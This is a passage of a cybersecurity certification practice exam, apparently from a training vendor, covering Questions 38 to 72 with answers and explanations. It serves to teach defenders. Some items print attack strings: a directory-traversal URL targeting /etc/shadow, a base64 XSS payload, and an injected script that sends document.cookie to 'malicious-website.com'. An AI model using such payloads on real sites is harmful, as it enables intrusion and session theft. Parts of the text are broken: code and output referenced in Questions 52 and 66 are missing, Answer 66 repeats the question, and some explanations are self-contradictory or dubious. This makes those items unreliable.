OBJ-2.6: Python is a commonly used scripting language used in cybersecurity. Python is a general-purpose programming language that can develop many different kinds of applications. It is designed to be easy to read, and the programs use fewer lines of code compared to other programming languages. The code runs in an interpreter. Python is preinstalled on many Linux distributions and can be installed on Windows. Python scripts are saved using the .py extension. PHP is used as a scripting language for web applications. C# and ASP.NET are both compiled languages, not scripting languages.

Question 38

You are working as a network engineer for a smartphone company that wants to begin offering contactless payment options with their devices. Which of the following technologies should they embed in their handsets to support contactless payments like Apple Pay, Samsung Pay, or Google Pay?

A. WiFi
B. Bluetooth
C. NFC
D. RFID

Answer 38

C. NFC

Explanation:
OBJ-3.1: Near-Field Communication (NFC) is a set of communication protocols for communication between two electronic devices over a distance of 4 cm or less. NFC offers a low-speed connection with a simple setup that can be used to bootstrap more capable wireless connections. NFC is used with payment systems like Apple Pay, Samsung Pay, and Google Pay since it supports two-way communication, unlike RFID which only supports one-way data transfers. Radio-frequency identification (RFID) uses electromagnetic fields to automatically identify and track tags attached to objects. Bluetooth is a short-range wireless technology standard that is used for exchanging data between fixed and mobile devices over short distances using UHF radio waves in the ISM band from 2.402 GHz to 2.48 GHz and building personal area networks. Bluetooth is often used to create peer-to-peer connections between two devices for a distance of up to 10 meters. Wi-Fi is a family of wireless network protocols, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access, allowing nearby digital devices to exchange data by radio waves. Wi-Fi can provide high speeds and cover a maximum distance of up to 150 meters.

Question 39

As a SOC analyst, you receive an alert concerning a dramatic slowdown affecting the company’s e-commerce server due to the load balancer’s critical failure. Your company depends on online sales for all of its business, and you know the immediate impact of this event will be a loss of sales. Which of the following is an appropriate classification of the impact in terms of the total impact and notification requirements? (SELECT THREE)

A. Total impact includes damages to the companys reputation
B. Notification of external authoriries is required
C. Total impact includes a loss of customers
D. Organization impact is anticipated
E. Localized impact is anticipated
F. Notification of external authorities is optional

Answer 39

C. Total impact includes a loss of customers
D. Organization impact is anticipated
F. Notification of external authorities is optional

Explanation:
OBJ-4.1: Since online sales are critical to business operations, the impact would be categorized as organizational and not localized. While the immediate impact is a loss of sales due to the slow servers causing customer frustration and abandoned carts, the longer-term impact could include losing customers who will never return. It is unlikely to include damages to the company’s reputation over this event, though it isn’t a major trust and security issue like a data breach. In terms of notification requirements, it is optional to inform external authorities since there is no evidence of a crime.

Question 40

What containment technique is the strongest possible response to an incident?

A. Segmentation
B. Isolating affected systems
C. Enumeration
D. Isolating the attacker

Answer 40

B. Isolating affected systems

Explanation:
OBJ-2.7: Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.

Question 41

You have been asked to select the best endpoint security control to meet the following requirement. The endpoint is a user workstation that is used by a typical office employee to conduct basic office functions like word processing and creating spreadsheets. Your organization wants to be able to determine if any unexpected behavior occurs on the endpoint or the system state is changed. Which of the following endpoint security controls would create alerts based on signature rules matching known malicious activity on the endpoint?

A. Endpoint detection and response (EDR)
B. Host based intrusion detection systems (HIDS)
C. Host based firewall
D. User and entity behavior analytics (UEBA)

Answer 41

B. Host based intrusion detection systems (HIDS)

Explanation:
OBJ-3.2: A host-based intrusion detection system (HIDS) is a type of IDS that monitors a computer system for unexpected behavior or drastic changes to the system’s state. Host-based intrusion detection systems normally rely on signature rules to identify potentially malicious activity on the endpoint and then create alerts based on the rule that was matched. A host-based firewall is a firewall implemented as application software running on the host that provides sophisticated filtering of network traffic as well as block processes at the application level. Endpoint detection and response (EDR) is a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats. User and entity behavior analytics (UEBA) is a type of cybersecurity application or appliance that identifies anomalous or malicious behavior by using machine learning and statistical analysis to identify deviations from normally established baselines and patterns of activity.

Question 42

During a security audit, you discovered that customer service employees have been sending unencrypted confidential information to their personal email accounts via email. What technology could you employ to detect these occurrences in the future and send an automated alert to the security team?

A. DLP
B. MDM
C. UTM
D. SSL

Answer 42

A. DLP

Explanation:
OBJ-1.1: Data loss prevention (DLP) software detects potential data breaches/data exfiltration transmissions and prevents them by monitoring, detecting, and blocking sensitive data while in use, in motion, and at rest. This can be configured to detect and alert on future occurrences of this issue. Secure Socket Layer (SSL) is a distraction in this question since the questions asked about information being sent unencrypted. The connection between the client and the email server could be encrypted using SSL. However, the information is still be sent to an employee’s personal email account, which equates to a loss of control over the company’s confidential data. Mobile Device Management (MDM) software is used for the configuration and securing of mobile devices like smartphones and tablets. Unified Threat Management (UTM) is a device that combines the functions of a firewall, anti-malware solution, and IDS into a single piece of hardware. Some UTM’s may provide a DLP functionality, but the answer of a DLP is a better answer to this question.

Question 43

Dion Training has implemented its own root CA to issue digital certificates to its users. Each digital certificate is valid for 3 years by default, but if a user’s account is disabled then their digital certificate must also be revoked. Which of the following would allow a client to request the status of a digital certification to determine if it was revoked without downloading the full list of certificate statuses?

A. HSTS
B. CRL
C. OCSP
D. HPKP

Answer 43

C. OCSP

Explanation:
OBJ-3.5: The online certificate status protocol (OCSP) allows clients to request the status of a digital certificate and to check whether it is revoked. A certificate revocation list (CRL) is a list of every digital certificate that has been revoked before its expiration date. HTTP Public Key Pinning (HPKP) is a certificate pinning method that embeds the certificate data in the HTTP header sent from a web server to a web browser. HTTP Strict Transport Security (HSTS) is configured as a response header on a web server and notifies a browser to connect to the requested website using HTTPS only. HSTS helps prevent on-path and downgrade attacks.

Question 44

Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which of the following would BEST be able to prevent this from happening?

A. Require a username and password for user logins
B. Require biometric identification for user logins
C. Install security cameras in secure areas to monitor logins
D. Enforce a policy that requires password to be changed every 30 days

Answer 44

B. Require biometric identification for user logins

Explanation:
OBJ-1.5: The BEST choice is to implement biometric identification for user logins, such as a fingerprint reader or a retina scanner. This would ensure that even if an employee could discover another employee’s username and password, they would be prevented from logging into the workstation without the employee’s finger or eye to scan. Enforcing short password retention can limit the possible damage when a password is disclosed, but it won’t prevent a login during the valid period. Security cameras may act as a deterrent or detective control, but they cannot prevent an employee from logging into the workstation as another employee. Security cameras could be used to determine who logged in after the fact, though.

Question 45

Which of the following functions is not provided by a TPM?

A. User authentication
B. Remote attestation
C. Random number generation
D. Secure generation of crypto keys
E. Sealing
F. Binding

Answer 45

A. User authentication

Explanation:
OBJ-3.2: User authentication is performed at a much higher level in the operating system. Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software cannot tamper with the security functions of the TPM. The TPM provides random number generation, secure generation of cryptographic keys, remote attestation, binding, and sealing functions securely.

Question 46

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting?

A. Buffer overflow
B. XML injection
C. Directory traversal
D. SQL Injection

Answer 46

C. Directory traversal

Explanation:
OBJ-2.5: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.

Question 47

Which of the following emerging technology will render modern cryptographic techniques that rely on the difficulty of solving complex math problems obsolete?

A. Distributed consensus
B. Artificial intelligennce
C. Quantum computing
D. Homomorphic encryption

Answer 47

C. Quantum computing

Explanation:
OBJ-1.8: Quantum computing combines physics, mathematics, and quantum mechanics to exploit the collective properties of quantum states. Quantum computing will render cryptography that relies on the difficulty of solving difficult math problems rapidly obsolete. Distributed consensus is used in a distributed or decentralized system to solve a particular computation to maintain the overall integrity of the distributed system or blockchain. Artificial Intelligence is the science of creating machines to develop problem-solving and analysis strategies without significant human direction or intervention. Homomorphic encryption is a method of encryption that allows the computation of certain fields in a dataset without first decrypting the dataset.

Question 48

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnSSBsb3ZlIERpb24gVHJhaW5pbmcnKTwvc2NyaXB0Pg==. What type of attack was attempted?

A. SQL Injection
B. XSS
C. XML Injection
D. Password spraying

Answer 48

B. XSS

Explanation:
OBJ-2.2: This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack. You can see the base64 encoded string of PHNjcmlwdD5hbGVydCgnSSBsb3ZlIERpb24gVHJhaW5pbmcnKTwvc2NyaXB0Pg== being used. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack. If you did have a base64 decoder, you would have found that the parameter being passed would translate to

alert('I love Dion Training')

, which is a simple method to cause your web browser to create a popup that displays the text “I love Dion Training.” If you attempt to load this URL in your browser, it may or may not function depending on your browser’s security.

Question 49

You have been asked to help design a new architecture for Dion Training’s website. The current architecture involves a single server that hosts the website in its entirety. The company’s newest course has been creating a lot of interest on social media. The CIO is concerned that the single server will not be able to handle the increased demand that could result from this increased publicity. What technology should you implement in the new architecture to allow multiple web servers to serve up the courses and meet this expected increase in demand from new students?

A. Load Balancer
B. RAID
C. DLP
D. VPN Concentrator

Answer 49

A. Load Balancer

Explanation:
OBJ-1.1: A load balancer allows for high availability and the ability to serve increased demand by splitting the workload across multiple servers. RAID is a high availability technology that allows for multiple hard disks to act logically act as one to handle more throughput, but this will not solve the higher demand on the server’s limited processing power as a load balancer would. A VPN concentrator is a networking device that provides the secure creation of VPN connections and the delivery of messages between VPN nodes. A data loss prevention (DLP) system is focused on ensuring that intellectual property theft does not occur. Therefore, a DLP will not help meet the increased demand from new students.

Question 50

You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don’t have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?

A. nmap -sX
B. nmap -sS
C. nmap -sT
D. nmap -O

Answer 50

C. nmap -sT

Explanation:
OBJ-2.4: The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

Question 51

Which of the following access control models is the most flexible and allows the resource owner to control the access permissions?

A. DAC
B. ABAC
C. RBAC
D. MAC

Answer 51

A. DAC

Explanation:
OBJ-1.5: Discretionary access control (DAC) stresses the importance of the owner. The original creator of the resource is considered the owner and can then assign permissions and ownership to others. The owner has full control over the resource and can modify its ACL to grant rights to others. This is the most flexible model and is currently implemented widely in Windows, Unix, Linux, and macOS systems.

Question 52

You are conducting static analysis of an application’s source code and see the following:

Based on this code snippet, which of the following security flaws exists in this application?

A. Improper input validation
B. Race condition
C. Insufficient logging and monitoring
D. Improper error handling

Answer 52

A. Improper input validation

Explanation:
OBJ-1.3: Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”: ‘>

document.location= ‘http://www.malicious-website.com/cgi-bin/cookie.cgi? Foo='+document.cookie

’. This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

Question 53

Dion Training requires that the staff simulate their response to a potential data breach. During this simulation, the staff gathers in the conference room and discusses each action they would take as part of their response. This information is then analyzed to ensure the company’s data breach response playbook is up to date and would work properly when needed. Which of the following best describes what the staff did?

A. Tabletop exercise
B. Business impact analysis
C. Incident response
D. Disaster recovery planning

Answer 53

A. Tabletop exercise

Explanation:
OBJ-4.4: A tabletop exercise involves gathering the key staff of an organization and discussing their actions during a potential unwanted event. The staff could further be divided into a blue team and a red team, with half playing the role of defenders and the other half playing the adversary’s role. Tabletop exercises are less expensive to conduct than a full-scale red team event or penetration test. Tabletop exercises are a great way to exercise existing procedures and response plans to identify any weaknesses within them.

Question 54

What is used to define how much bandwidth can be used by various protocols on the network?

A. High availability
B. Load balancing
C. Traffic shaping
D. Fault tolerance

Answer 54

C. Traffic shaping

Explanation:
OBJ-1.2: Traffic shaping, also known as packet shaping, is the manipulation and prioritization of network traffic to reduce the impact of heavy users or machines from affecting other users. Traffic shaping is used to optimize or guarantee performance, improve latency, or increase usable bandwidth for some kinds of packets by delaying other kinds. High availability (HA) is a component of a technology system that eliminates single points of failure to ensure continuous operations or uptime for an extended period. Fault tolerance refers to the ability of a system (computer, network, cloud cluster, etc.) to continue operating without interruption when one or more of its components fail. Load balancing refers to the process of distributing a set of tasks over a set of resources, intending to make their overall processing more efficient. Load balancing can optimize the response time and avoid unevenly overloading some compute nodes while other compute nodes are left idle.

Question 55

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?

A. Hardening the DEV_SERVER7 server
B. Conduct a data criticality and prioritization analysis
C. Conduct a Nessus scan on the FIREFLY server
D. Logically isolate the PAYROLL_DB server from the production network

Answer 55

B. Conduct a data criticality and prioritization analysis

Explanation:
OBJ-2.7: While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems that would be a more lucrative target for APT 38 than the PAYROLL_DB. The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.

Question 56

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

A. SNMP
B. NetFlow
C. MIB
D. SMTP

Answer 56

A. SNMP

Explanation:
OBJ-1.1: Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device’s status, including CPU and memory utilization, and many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.

Question 57

What type of cloud model would allow the sharing of resources by multiple organizations to create a service that benefits all of its members?

A. Private Cloud
B. Public Cloud
C. Hybrid Cloud
D. Community Cloud

Answer 57

D. Community Cloud

Explanation:
OBJ-1.6: A community cloud in computing is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns, whether managed internally or by a third party and hosted internally or externally. Community Cloud is a hybrid form of private cloud. They are multi-tenant platforms that enable different organizations to work on a shared platform. Community Cloud may be hosted in a data center, owned by one of the tenants, or by a third-party cloud services provider and can be either on-site or off-site. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A hybrid cloud is a cloud computing environment that uses a mix of on-premises, private cloud, and third-party public cloud services with orchestration between these platforms. This typically involves a connection from an on-premises data center to a public cloud.

Question 58

Dion Training has recently set up some virtual servers in a virtual private cloud (VPC) with a cloud service provider. These servers need to connect to services outside the VPC while still preventing external services from initiating a connection with those virtual servers. Which of the following services should be implemented to meet these security requirements?

A. API Gateway
B. XML Gateway
C. NAT Gateway
D. VPN Gateway

Answer 58

C. NAT Gateway

Explanation:
OBJ-1.1: A NAT Gateway within a cloud platform allows private subnets in a Virtual Private Cloud (VPC) access to the Internet. You can use a NAT gateway so that instances in a private subnet can connect to services outside your VPC but external services cannot initiate a connection with those instances. A VPN gateway is a type of networking device that connects two or more devices or networks in a VPN infrastructure. It is designed to bridge the connection or communication between two or more remote sites, networks, or devices and/or to connect multiple VPNs. An extensible markup language (XML) gateway acts as an application layer firewall specifically to monitor XML formatted messages as they enter or leave a network or system. An XML gateway is used for inbound pattern detection and the prevention of outbound data leaks. XML is a document structure that is both human and machine-readable. Information within an XML document is placed within tags that describe how the information within the document is structured. Application programming interface (API) gateway is a special cloud-based service that is used to centralize the functions provided by APIs. An API is a type of software interface that offers a service to other pieces of software to build or connect to specific functions or features.

Question 59

You are planning an engagement with a new client. The client wants your penetration testers to target their web and email servers that are hosted in a screened subnet and are accessible to visitors over the Internet. Which target type best describes these targets?

A. Third party hosted
B. First party hosted
C. Internal
D. External

Answer 59

D. External

Explanation:
OBJ-2.4: An external target type best describes these targets since the question doesn’t clearly describe if the servers are first-party or third-party hosted. An external target type is an asset that can be accessed from outside of the organization. For example, if the webserver is visible on the Internet, it is considered an external target. An internal target type means that assets can be accessed from within the organization. This can either be physically or logically from within the network, and it best simulates an insider threat. This target type can also be used to simulate an external hacker who has gained credentials on the network, such as using a spear phishing attack. First-party hosted targets are assets hosted by the client organization themselves. Third-party hosted targets are assets hosted by a vendor, partner, or cloud service provider.

Question 60

Fail To Pass Systems has just been the victim of another embarrassing data breach. Their database administrator needed to work from home this weekend, so he downloaded the corporate database to his work laptop. On his way home, he left the laptop in an Uber, and a few days later, the data was posted on the internet. Which of the following mitigations would have provided the greatest protection against this data breach?

A. Require a VPN to be utilized for all telework employees
B. Require all new employees to sign an NDA
C. Require data masking for any information stored in the database
D. Require data at rest encryption on all endpoints

Answer 60

D. Require data at rest encryption on all endpoints

Explanation:
OBJ-3.1: The greatest protection against this data breach would have been to require data at rest encryption on all endpoints, including this laptop. If the laptop were encrypted, the data would not have been readable by others, even if it was lost or stolen. While requiring a VPN for all telework employees is a good idea, it would not have prevented this data breach since the laptop’s loss caused it. Even if a VPN had been used, the same data breach would have still occurred if the employee copied the database to the machine. Remember on exam day that many options are good security practices, but you must select the option that solves the issue or problem in the question being asked. Similarly, data masking and NDAs are useful techniques, but they would not have solved this particular data breach.

Question 61

Dion Training normally rotates their public/private key pairs every 12 months to protect against a potential data breach. These key pairs are then stored in an encrypted online backup with a trusted third-party provider. Unfortunately, the third-party provider just announced that a malicious insider has downloaded a copy of the key pairs. Which of the following actions should Dion Training perform to mitigate this situation?

A. Replace the public/private key pairs with self signed certs
B. Immediately revoke and reissue new public/private key pairs to all users
C. Conduct a key rotation next month per the regular schedule
D. Conduct crypto shredding of the existing public/private key pairs to protect them

Answer 61

B. Immediately revoke and reissue new public/private key pairs to all users

Explanation:
OBJ-3.7: A compromised or exposed key occurs when unauthorized access to a symmetric or private key is gained. When a key is compromised or exposed, it must be revoked and replaced. Key rotation is the process of purposely changing keys periodically to mitigate against brute force attacks and key disclosure compromises. During key rotation, the previous key is also revoked and invalidated. Crypto shredding is used to destroy a decryption key to effectively destroy the data that key was used to protect. This technique ensures that the data will remain encrypted if the key is fully destroyed and the encryption algorithm itself remains secure. A self-signed certificate is a certificate generated independently of a certificate authority and is considered not trustworthy.

Question 62

Which role validates the user’s identity when using SAML for authentication?

A. SP
B. User agent
C. RP
D. IdP

Answer 62

D. IdP

Explanation:
OBJ-1.5: The IdP provides the validation of the user’s identity. Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

Question 63

Which of the following will an adversary do during the installation phase of the Lockheed Martin kill chain? (SELECT FOUR)

A. Install a backdoor/implant on a client victim
B. Create a point of presence by adding services, scheduled tasks, or AutoRun keys
C. Collect user credentials
D. Open two way communication channel to an established C2 infrastructure
E. Install a webshell on a server
F. Timestomp a malware file to make it appears as if it is part of the OS

Answer 63

A. Install a backdoor/implant on a client victim
B. Create a point of presence by adding services, scheduled tasks, or AutoRun keys
E. Install a webshell on a server
F. Timestomp a malware file to make it appears as if it is part of the OS

Explanation:
OBJ-2.1: During the installation phase, the adversary is taking actions to establish a footprint on the target system and is attempting to make it difficult for a defender to detect their presence. The attack may also attempt to confuse any attempts to remove the adversary from the system if the detection of their presence occurs. Due to this, an attacker will attempt to install multiple backdoors, implants, web shells, scheduled tasks, services, or AutoRun keys to maintain their access to the target. Timestomping is also conducted to hide the presence of malware on the system. Opening up two-way communication with an established C2 infrastructure occurs in the command and control phase. Collecting user credentials occurs in the actions on objectives phase.

Question 64

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

A. Remediate the vulnerability
B. Wait until the next scheduled maintenance window to remediate the vulnerability
C. Delay the remediation until the next major update of the SQL server occurs
D. Schedule an emergency maintenance for an off peak time later in the day to remediate the vulnerability

Answer 64

D. Schedule an emergency maintenance for an off peak time later in the day to remediate the vulnerability

Explanation:
OBJ-4.2: Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.

Question 65

A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume?

A. Acquire the recovery key
B. Extract thee keys from iCloud
C. Retrieve the key from memory while the volume is mounted
D. Conduct a brute force attack against the FileVault2 encryption

Answer 65

D. Conduct a brute force attack against the FileVault2 encryption

Explanation:
OBJ-2.8: FileVault 2 is a full-disk encryption system used on macOS devices. A drive can be decrypted if you have the encryption key. This key can be recovered from memory while the volume is mounted. The Recovery key can also be obtained either from the user’s notes or from their storage area of iCloud. You cannot unlock the volume by conducting a brute force attack against the drive. It uses the AES 256-bit encryption system, which is currently unbreakable without access to a supercomputer. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

Question 66

Jason has created a new password cracking tool using some Python code. When he runs the program, the following output is displayed:
Based on the output, what type of password cracking method does Jason’s new tool utilize?

A. Brute force attack
B. Rainbow attack
C. Dictionary attack
D. Hybrid attack

Answer 66

Jason has created a new password cracking tool using some Python code. When he runs the program, the following output is displayed:
Based on the output, what type of password cracking method does Jason’s new tool utilize?

Explanation:
OBJ-2.4: Based on the passwords found in the example, Jason’s new password cracker is most likely using a hybrid approach. All of the passwords found are dictionary words with some additional characters added to the end. For example, Jason’s password of rover123 is made up of the dictionary word “rover” and the number 123. The cracker likely attempted to use a dictionary word (like rover) and the attempted variations on it using brute force (such as adding 000, 001, 002, …122, 123) to the end of the password until found. Combining the dictionary and brute force methods into a single tool is known as a hybrid password cracking approach.

Question 67

Dion Training has just been awarded a contract to provide training to one of the U.S. Government’s agencies. As part of the contract, Dion Training must encrypt any data being sent to the government using a NIST-approved Federal Information Processing Standard (FIPS) 197. Which symmetric-key algorithm should Dion Training use to meet this contractual requirement?

A. ECC
B. DSA
C. AES
D. 3DES

Answer 67

C. AES

Explanation:
OBJ-3.6: The advanced encryption standard (AES) is a cryptographic algorithm used to perform symmetric data encryption using a 128-bit, 192-bit, or 256-bit key. It is approved by NIST as FIPS 197 for all U.S. Government data encryption. Even if you didn’t know that AES was defined in FIPS 197, only the AES and 3DES options are symmetric-key algorithms in this question. Elliptic curve cryptography is a public-key cryptographic algorithm based on the algebraic structure of elliptic curves over finite fields. ECC allows smaller key sizes compared to non-elliptic curve cryptography methods while still providing the equivalent level of security. ECC is heavily used in mobile devices and low-powered device encryption. Triple DES (3DES) is a symmetric-key block cipher that uses a series of encrypt, decrypt, and encrypt functions with three different 56-bit keys to increase the security of the data encryption standard (DES). The digital signature algorithm (DSA) is a cryptographic algorithm that uses logarithmic and modulus math to generate and verify digital signatures. The DSA is faster than RSA at generating digital signatures, but it is slower than RSA when verifying them.

Question 68

Dion Development Group is creating a new communication protocol to aid in the secure transfer of large amounts of data. The programmers programmed the protocol to renegotiate a new session key every 5 minutes or after every 1 GB of data transfer, whichever occurs first during the established communication session. Which of the following cryptographic implementations is used by this communication protocol?

A. Rekeying
B. Key rotation
C. Cryptoshredding
D. Cryptographic obfuscation

Answer 68

A. Rekeying

Explanation:

OBJ-3.7: Rekeying is the process of changing an individual key during a communication session. Most communication protocols use session key rekeying to protect the data being transmitted. A rekeying is normally triggered based on the volume of data communicated or the amount of time since the last rekeying. Key rotation is the process of purposely changing keys periodically to mitigate against brute force attacks and key disclosure compromises. During key rotation, the previous key is also revoked and invalidated. Crypto shredding is used to destroy a decryption key to effectively destroy the data that key was used to protect. This technique ensures that the data will remain encrypted if the key is fully destroyed and the encryption algorithm itself remains secure. Cryptographic obfuscation is used to transform protected data into an unreadable format. For example, the Linux user passwords stored in the /etc/shadow file are obfuscated to protect them.

Question 69

Dion Training has developed a complex software as a service product and is moving into the testing phase. The architecture contains individual elements that were developed by different teams in the organization and tested by each team individually. Which of the following types of testing should Dion Training utilize to ensure all of the individual elements are interacting properly when configured into the final product?

A. Integration testing
B. CI/CD
C. Unit testing
D. Regression testing

Answer 69

A. Integration testing

Explanation:
Integration testing is used to test individual components of a system together to ensure that they interact as expected. Unit testing is used to test a particular block of code performs the exact action intended and provides the exact output expected. Normally, unit testing is coded into the software using simply pass/no pass tests for each block of code. Regression testing is the process of testing an application after changes are made to see if these changes have triggered problems in older areas of code. Continuous integration/continuous delivery (CI/CD) is a software development methodology in which code updates are tested and committed to a development or build server/code repository rapidly.

Question 70

Dion Training is building a cybersecurity escape room as a promotional event at an upcoming security conference. Jason wants to use some form of operational technology to open and shut various doors, windows, and secret compartments in the room. Each physical element must be open or shut based on different logic and programming. Which of the following types of operational technology would allow Jason to program a specific function for each physical element during the installation and implementation?

A. FPGA
B. ASIC
C. IoT
D. SoC

Answer 70

A. FPGA

Explanation:
OBJ-3.3: A field programmable gate array (FPGA) is a type of processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture. A FPGA can be configured by the end customer to run programming logic on the device for their specific use case or application. An application-specific integrated circuit (ASIC) is a type of processor designed to perform a specific function. ASICs are expensive to design and only work for a single application or function, such as the ASICs used to conduct switching in an Ethernet switch. A System on a Chip (SoC) integrates practically all the components of a traditional chipset (which is comprised of as many as four chips that control communication between the CPU, RAM, storage, and peripherals) into a single chip. SoC includes the processor as well as a GPU (graphics processor), memory, USB controller, power management circuits, and wireless radios. Internet of Things (IoT) is a term used to describe a global network of appliances and personal devices that have been equipped with sensors, software, and network connectivity. The Internet of Things includes hub/control systems, smart devices, wearables, and sensors.

Question 71

Which of the following Wireshark filters should be applied to a packet capture to detect applications that send passwords in cleartext to a REST API located at 10.1.2.3?

A. ip.dst=10.1.2.3
B. http.request.method==”POST” && ip.dst==10.1.2.3
C. http.request.method==”POST”
D. ip.proto==tcp

Answer 71

B. http.request.method==”POST” && ip.dst==10.1.2.3

Explanation:
OBJ-2.9: Filtering the available PCAP with just the http “post” methods would display any data sent when accessing a REST API, regardless of the destination IP. Filtering the available PCAP with just the desired IP address would show all traffic to that host (10.1.2.3). Combining both of these can minimize the data displayed to only show things posted to the API located at 10.1.2.3. The ip.proto==tcp filter would display all TCP traffic on a network, regardless of the port, IP address, or protocol being used. It would simply produce too much information to analyze.

Question 72

In 2014, Apple’s implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of?

A. Insecure object reference
B. Use of insecure functions
C. Improper error handling
D. Insufficient logging and monitoring

Answer 72

C. Improper error handling

Explanation:
